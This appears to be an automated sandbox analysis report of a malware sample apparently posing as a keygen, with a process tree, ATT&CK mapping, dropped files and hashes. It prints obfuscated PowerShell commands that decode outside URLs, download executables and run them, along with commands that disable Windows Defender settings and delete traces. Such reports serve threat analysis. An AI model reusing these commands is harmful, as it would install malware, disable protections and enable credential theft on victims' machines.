                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL omdrklgfia $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;omdrklgfia yvshnex $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|yvshnex;omdrklgfia gemjhbnrwydsof $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhKdg==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);gemjhbnrwydsof $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                  4⤵
                  • Blocklisted process makes network request
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of WriteProcessMemory
                  PID:1128
                  • C:\Users\Public\xml.exe
                    "C:\Users\Public\xml.exe"
                    5⤵
                    • Executes dropped EXE
                    • Suspicious use of SetThreadContext
                    • Modifies registry class
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:4984
                    • C:\Windows\SysWOW64\WScript.exe
                      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Rarujmxnv.vbs"
                      6⤵
                        PID:4928
                        • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                          "C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe"
                          7⤵
                          • Executes dropped EXE
                          • Suspicious use of SetThreadContext
                          • Modifies registry class
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2436
                          • C:\Windows\SysWOW64\WScript.exe
                            "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Coctuoidu.vbs"
                            8⤵
                              PID:4836
                              • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                                "C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe"
                                9⤵
                                • Executes dropped EXE
                                • Suspicious use of SetThreadContext
                                • Suspicious use of AdjustPrivilegeToken
                                PID:4508
                                • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                                  "C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe"
                                  10⤵
                                  • Executes dropped EXE
                                  PID:4320
                            • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                              "C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe"
                              8⤵
                              • Executes dropped EXE
                              PID:1428
                            • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                              "C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe"
                              8⤵
                              • Executes dropped EXE
                              • Loads dropped DLL
                              • Checks processor information in registry
                              PID:4640
                              • C:\Windows\SysWOW64\cmd.exe
                                "C:\Windows\System32\cmd.exe" /c taskkill /pid 4640 & erase C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe & RD /S /Q C:\\ProgramData\\989040061691467\\* & exit
                                9⤵
                                  PID:4920
                                  • C:\Windows\SysWOW64\taskkill.exe
                                    taskkill /pid 4640
                                    10⤵
                                    • Kills process with taskkill
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:2772
                          • C:\Users\Public\xml.exe
                            "C:\Users\Public\xml.exe"
                            6⤵
                            • Executes dropped EXE
                            PID:4304
                          • C:\Users\Public\xml.exe
                            "C:\Users\Public\xml.exe"
                            6⤵
                            • Executes dropped EXE
                            PID:5012
                          • C:\Users\Public\xml.exe
                            "C:\Users\Public\xml.exe"
                            6⤵
                            • Executes dropped EXE
                            PID:4116
                    • C:\Windows\SysWOW64\mshta.exe
                      "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\2EC6.tmp\b1.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
                      3⤵
                      • Suspicious use of WriteProcessMemory
                      PID:3276
                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL ftdrmoulpbhgsc $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;ftdrmoulpbhgsc rfmngajuyepx $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|rfmngajuyepx;ftdrmoulpbhgsc hnjmzobgr $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3Bkc2hjanZudi51Zy96eGN2Yi5leGU=';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);hnjmzobgr $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                        4⤵
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:200
                    • C:\Windows\SysWOW64\timeout.exe
                      timeout 2
                      3⤵
                      • Delays execution with timeout.exe
                      PID:3196
                    • C:\Windows\SysWOW64\mshta.exe
                      "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\2EC6.tmp\ba.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
                      3⤵
                      • Suspicious use of WriteProcessMemory
                      PID:4344
                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL vfudzcotabjeq $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;vfudzcotabjeq urdjneqmx $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|urdjneqmx;vfudzcotabjeq wuirkcyfmgjql $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhKRA==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);wuirkcyfmgjql $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                        4⤵
                        • Blocklisted process makes network request
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:4416
                        • C:\Users\Public\bnw.exe
                          "C:\Users\Public\bnw.exe"
                          5⤵
                          • Executes dropped EXE
                          • Suspicious use of SetThreadContext
                          • Suspicious behavior: MapViewOfSection
                          • Suspicious use of SetWindowsHookEx
                          PID:4720
                          • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                            "C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
                            6⤵
                            • Executes dropped EXE
                            • Suspicious use of SetThreadContext
                            • Suspicious behavior: MapViewOfSection
                            • Suspicious use of SetWindowsHookEx
                            PID:2572
                            • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                              "C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
                              7⤵
                              • Executes dropped EXE
                              • Loads dropped DLL
                              • Checks processor information in registry
                              PID:4968
                              • C:\Windows\SysWOW64\cmd.exe
                                "C:\Windows\System32\cmd.exe" /c taskkill /pid 4968 & erase C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe & RD /S /Q C:\\ProgramData\\515805078088114\\* & exit
                                8⤵
                                  PID:3420
                                  • C:\Windows\SysWOW64\taskkill.exe
                                    taskkill /pid 4968
                                    9⤵
                                    • Kills process with taskkill
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:732
                            • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                              "C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
                              6⤵
                              • Executes dropped EXE
                              • Suspicious use of SetThreadContext
                              • Suspicious behavior: MapViewOfSection
                              • Suspicious use of SetWindowsHookEx
                              PID:2676
                              • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                                "C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
                                7⤵
                                • Executes dropped EXE
                                PID:4972
                            • C:\Users\Public\bnw.exe
                              "C:\Users\Public\bnw.exe"
                              6⤵
                              • Executes dropped EXE
                              PID:4736
                      • C:\Windows\SysWOW64\mshta.exe
                        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\2EC6.tmp\ba1.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
                        3⤵
                        • Suspicious use of WriteProcessMemory
                        PID:4496
                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL wvroy $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;wvroy bwskyfgqtipu $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|bwskyfgqtipu;wvroy shlevpgb $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3JiY3h2bmIudWcvenhjdmIuZXhl';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);shlevpgb $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                          4⤵
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          PID:4608
                  • C:\Windows\SysWOW64\DllHost.exe
                    C:\Windows\SysWOW64\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                    1⤵
                      PID:504
                      • C:\Windows\SysWOW64\cmd.exe
                        cmd /c start C:\Windows\temp\u5oxsmtn.exe
                        2⤵
                          PID:2824
                          • C:\Windows\temp\u5oxsmtn.exe
                            C:\Windows\temp\u5oxsmtn.exe
                            3⤵
                            • Executes dropped EXE
                            PID:4540
                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              "powershell" Get-MpPreference -verbose
                              4⤵
                              • Suspicious use of AdjustPrivilegeToken
                              PID:4532
                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableArchiveScanning $true
                              4⤵
                              • Suspicious use of AdjustPrivilegeToken
                              PID:4252
                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBlockAtFirstSeen $true
                              4⤵
                              • Suspicious use of AdjustPrivilegeToken
                              PID:4324
                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableIOAVProtection $true
                              4⤵
                              • Suspicious use of AdjustPrivilegeToken
                              PID:4280
                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisablePrivacyMode $true
                              4⤵
                              • Suspicious use of AdjustPrivilegeToken
                              PID:4712
                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableScriptScanning $true
                              4⤵
                              • Suspicious use of AdjustPrivilegeToken
                              PID:2624
                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -HighThreatDefaultAction 6 -Force
                              4⤵
                              • Suspicious use of AdjustPrivilegeToken
                              PID:4744
                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -LowThreatDefaultAction 6
                              4⤵
                              • Suspicious use of AdjustPrivilegeToken
                              PID:4128
                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting 0
                              4⤵
                              • Suspicious use of AdjustPrivilegeToken
                              PID:4548
                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ModerateThreatDefaultAction 6
                              4⤵
                              • Suspicious use of AdjustPrivilegeToken
                              PID:4376
                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SevereThreatDefaultAction 6
                              4⤵
                                PID:5300
                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true
                                4⤵
                                  PID:5384
                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent 2
                                  4⤵
                                    PID:5576
                              • C:\Windows\SysWOW64\taskkill.exe
                                taskkill /IM cmstp.exe /F
                                2⤵
                                • Kills process with taskkill
                                • Suspicious use of AdjustPrivilegeToken
                                PID:4696

                            Network

                            MITRE ATT&CK Matrix ATT&CK v6

                            Persistence

                            Modify Existing Service

                            1
                            T1031

                            Defense Evasion

                            Modify Registry

                            2
                            T1112

                            Disabling Security Tools

                            2
                            T1089

                            Credential Access

                            Credentials in Files

                            3
                            T1081

                            Discovery

                            Query Registry

                            2
                            T1012

                            System Information Discovery

                            2
                            T1082

                            Collection

                            Data from Local System

                            3
                            T1005

                            Replay Monitor

                            Loading Replay Monitor...

                            Downloads

                            • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
                            • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                            • C:\Users\Admin\AppData\Local\Temp\1SG1l5Bx4Q.exe
                              MD5

                              013db621a3351e3fb049efd2ccad79ff

                              SHA1

                              a23394ea54dbc5342a77938a2c285ee616185560

                              SHA256

                              df1bda6183201e4dc1bc6f6425361a565413e71f09da0648b0c82b39786af27a

                              SHA512

                              1bf6d076677b234c9da7cbc720fc64632b587b4223b5370a7ca3d53c4d59fa59ef117957b1646c92ba80dac332f6c1c313060d35de7236b2585e5bed00d79229

                            • C:\Users\Admin\AppData\Local\Temp\2EC6.tmp\Keygen.exe
                            • C:\Users\Admin\AppData\Local\Temp\2EC6.tmp\Keygen.exe
                            • C:\Users\Admin\AppData\Local\Temp\2EC6.tmp\b.hta
                            • C:\Users\Admin\AppData\Local\Temp\2EC6.tmp\b1.hta
                            • C:\Users\Admin\AppData\Local\Temp\2EC6.tmp\ba.hta
                            • C:\Users\Admin\AppData\Local\Temp\2EC6.tmp\ba1.hta
                            • C:\Users\Admin\AppData\Local\Temp\2EC6.tmp\m.hta
                            • C:\Users\Admin\AppData\Local\Temp\2EC6.tmp\m1.hta
                            • C:\Users\Admin\AppData\Local\Temp\2EC6.tmp\start.bat
                            • C:\Users\Admin\AppData\Local\Temp\Coctuoidu.vbs
                            • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                            • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                            • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                            • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                            • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                            • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                            • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                            • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                            • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                            • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                            • C:\Users\Admin\AppData\Local\Temp\PdnCqbL3Dd.exe
                            • C:\Users\Admin\AppData\Local\Temp\PdnCqbL3Dd.exe
                            • C:\Users\Admin\AppData\Local\Temp\Rarujmxnv.vbs
                            • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                            • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                            • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                            • C:\Users\Admin\AppData\Local\Temp\elKnDuihQa.exe
                            • C:\Users\Admin\AppData\Local\Temp\elKnDuihQa.exe
                            • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                            • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                            • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                            • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                            • C:\Users\Admin\AppData\Local\Temp\qm5M4J91Ff.exe
                            • C:\Users\Admin\AppData\Local\Temp\qm5M4J91Ff.exe
                            • C:\Users\Public\bnw.exe
                            • C:\Users\Public\bnw.exe
                            • C:\Users\Public\bnw.exe
                            • C:\Users\Public\png.exe
                            • C:\Users\Public\png.exe
                            • C:\Users\Public\png.exe
                            • C:\Users\Public\xml.exe
                            • C:\Users\Public\xml.exe
                            • C:\Users\Public\xml.exe
                            • C:\Users\Public\xml.exe
                            • C:\Users\Public\xml.exe
                            • C:\Windows\Temp\u5oxsmtn.exe
                              MD5

                              f4b5c1ebf4966256f52c4c4ceae87fb1

                              SHA1

                              ca70ec96d1a65cb2a4cbf4db46042275dc75813b

                              SHA256

                              88e7d1e5414b8fceb396130e98482829eac4bdc78fbc3fe7fb3f4432137e0e03

                              SHA512

                              02a7790b31525873ee506eec4ba47800310f7fb4ba58ea7ff4377bf76273ae3d0b4269c7ad866ee7af63471a920c4bd34a9808766e0c51bcaf54ba2e518e6c1e

                            • C:\Windows\temp\raie5qht.inf
                            • C:\Windows\temp\u5oxsmtn.exe
                              MD5

                              f4b5c1ebf4966256f52c4c4ceae87fb1

                              SHA1

                              ca70ec96d1a65cb2a4cbf4db46042275dc75813b

                              SHA256

                              88e7d1e5414b8fceb396130e98482829eac4bdc78fbc3fe7fb3f4432137e0e03

                              SHA512

                              02a7790b31525873ee506eec4ba47800310f7fb4ba58ea7ff4377bf76273ae3d0b4269c7ad866ee7af63471a920c4bd34a9808766e0c51bcaf54ba2e518e6c1e

                            • \??\PIPE\lsarpc
                            • \ProgramData\mozglue.dll
                            • \ProgramData\mozglue.dll
                            • \ProgramData\mozglue.dll
                            • \ProgramData\nss3.dll
                              MD5

                              bfac4e3c5908856ba17d41edcd455a51

                              SHA1

                              8eec7e888767aa9e4cca8ff246eb2aacb9170428

                              SHA256

                              e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

                              SHA512

                              2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

                            • \ProgramData\nss3.dll
                              MD5

                              bfac4e3c5908856ba17d41edcd455a51

                              SHA1

                              8eec7e888767aa9e4cca8ff246eb2aacb9170428

                              SHA256

                              e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

                              SHA512

                              2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

                            • \ProgramData\nss3.dll
                              MD5

                              bfac4e3c5908856ba17d41edcd455a51

                              SHA1

                              8eec7e888767aa9e4cca8ff246eb2aacb9170428

                              SHA256

                              e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

                              SHA512

                              2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

                            • \ProgramData\sqlite3.dll
                            • \ProgramData\sqlite3.dll
                            • \ProgramData\sqlite3.dll
                            • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\freebl3.dll
                            • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\freebl3.dll
                            • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\freebl3.dll
                            • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\mozglue.dll
                            • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\nss3.dll
                              MD5

                              02cc7b8ee30056d5912de54f1bdfc219

                              SHA1

                              a6923da95705fb81e368ae48f93d28522ef552fb

                              SHA256

                              1989526553fd1e1e49b0fea8036822ca062d3d39c4cab4a37846173d0f1753d5

                              SHA512

                              0d5dfcf4fb19b27246fa799e339d67cd1b494427783f379267fb2d10d615ffb734711bab2c515062c078f990a44a36f2d15859b1dacd4143dcc35b5c0cee0ef5

                            • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\softokn3.dll
                            • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\softokn3.dll
                            • \Users\Admin\AppData\LocalLow\sqlite3.dll
                            • memory/200-28-0x0000000000000000-mapping.dmp
                            • memory/200-34-0x0000000070B30000-0x000000007121E000-memory.dmp
                              Filesize

                              6.9MB

                            • memory/732-218-0x0000000000000000-mapping.dmp
                            • memory/1128-26-0x0000000070B30000-0x000000007121E000-memory.dmp
                              Filesize

                              6.9MB

                            • memory/1128-24-0x0000000000000000-mapping.dmp
                            • memory/1128-57-0x00000000085B0000-0x00000000085B1000-memory.dmp
                              Filesize

                              4KB

                            • memory/1284-295-0x000000000B610000-0x000000000B615000-memory.dmp
                              Filesize

                              20KB

                            • memory/1284-283-0x0000000000B60000-0x0000000000B61000-memory.dmp
                              Filesize

                              4KB

                            • memory/1284-291-0x000000000AF90000-0x000000000AFA2000-memory.dmp
                              Filesize

                              72KB

                            • memory/1284-273-0x0000000000000000-mapping.dmp
                            • memory/1284-277-0x0000000072650000-0x0000000072D3E000-memory.dmp
                              Filesize

                              6.9MB

                            • memory/1284-287-0x0000000002C50000-0x0000000002C51000-memory.dmp
                              Filesize

                              4KB

                            • memory/1436-301-0x00000000044C0000-0x00000000044C1000-memory.dmp
                              Filesize

                              4KB

                            • memory/1436-297-0x0000000000000000-mapping.dmp
                            • memory/1436-299-0x00000000044C0000-0x00000000044C1000-memory.dmp
                              Filesize

                              4KB

                            • memory/1508-0-0x0000000000000000-mapping.dmp
                            • memory/2064-35-0x0000000007580000-0x0000000007581000-memory.dmp
                              Filesize

                              4KB

                            • memory/2064-15-0x0000000070B30000-0x000000007121E000-memory.dmp
                              Filesize

                              6.9MB

                            • memory/2064-69-0x0000000009330000-0x0000000009331000-memory.dmp
                              Filesize

                              4KB

                            • memory/2064-32-0x0000000006D60000-0x0000000006D61000-memory.dmp
                              Filesize

                              4KB

                            • memory/2064-13-0x0000000000000000-mapping.dmp
                            • memory/2064-72-0x00000000088E0000-0x00000000088E1000-memory.dmp
                              Filesize

                              4KB

                            • memory/2088-2-0x0000000000000000-mapping.dmp
                            • memory/2088-3-0x0000000000000000-mapping.dmp
                            • memory/2136-271-0x0000000000000000-mapping.dmp
                            • memory/2136-414-0x0000000003D70000-0x0000000003DBC000-memory.dmp
                              Filesize

                              304KB

